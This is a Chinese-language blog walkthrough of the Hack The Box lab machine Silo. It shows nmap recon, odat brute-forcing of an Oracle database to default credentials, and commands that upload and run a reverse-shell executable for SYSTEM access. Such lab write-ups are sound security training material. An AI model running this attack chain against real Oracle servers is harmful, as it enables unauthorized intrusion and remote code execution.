Flydragon's Blog
466 words
2 minutes
[HTB] Silo Walkthrough
2024-04-14
HTB
Write-up
Chinese

visitor badge

前言#

這台是 Hack The Box 的 Silo,難度是 Medium

使用到的技巧:

  1. odat 滲透 Oracle database

Attacker: 10.10.16.2
Target: 10.10.10.82

Recon#

  1. nmap
sudo nmap -sV -sC 10.10.10.82
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -3m49s, deviation: 0s, median: -3m49s
| smb2-security-mode: 
|   3.0.2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-04-12T02:38:38
|_  start_date: 2024-04-12T02:27:39
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported

再掃一下 smb

sudo nmap -sV -sC -p445 --script=smb-vuln* 10.10.10.82
Host script results:
|_smb-vuln-ms10-061: No accounts left to try
|_smb-vuln-ms10-054: false

smbclient、smbmap、dirsearch 沒找到什麼,轉換目標摸摸看 oracle-tns

  1. odat

可以參考這篇,寫得很清晰明瞭
https://www.whiteoaksecurity.com/blog/exploiting-oracle-databases-with-odat/

sudo odat all -s 10.10.10.82

經過漫長的等待可以拿到這個 credential

[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger

Exploit#

到 odat 的 github page (或是 -h) 可以知道 utlfile 這個 module 可以用來上傳/下載/刪除檔案
可以嘗試上傳 reverse shell

odat utlfile -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --putFile /test reverse-shell.exe /home/kali/HTB/Windows_tools/reverse-shell.exe

權限不夠

[-] Impossible to put the ../../Windows_tools/reverse-shell.exe file: `ORA-01031: insufficient privileges`

嘗試加上 sysdba flag

odat utlfile -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --putFile /test reverse-shell.exe /home/kali/HTB/Windows_tools/reverse-shell.exe --sysdba

還是不行,嘗試另外兩個可以上傳檔案的 module 也失敗

[-] Impossible to put the /home/kali/HTB/Windows_tools/reverse-shell.exe file: `ORA-29283: invalid file operation ORA-06512: at "SYS.UTL_FILE", line 536 ORA-29283: invalid file operation ORA-06512: at line 1`

最後換個上傳路徑才成功

odat utlfile -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --putFile /temp reverse-shell.exe /home/kali/HTB/Windows_tools/reverse-shell.exe --sysdba

接下來再執行上傳的 shell

odat externaltable -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --exec /temp reverse-shell.exe --sysdba

img
執行成功ㄌ! 但沒收到 shell 就很玄。
不過重新生一個 shell 就成功了,虛驚一場
img 直接拿到 system

[HTB] Silo Walkthrough
https://flydragonw.github.io/posts/htb_silo/
Author
FlyDragon
Published at
2024-04-14
[HTB] Jerry Walkthrough
[HTB] Granny Walkthrough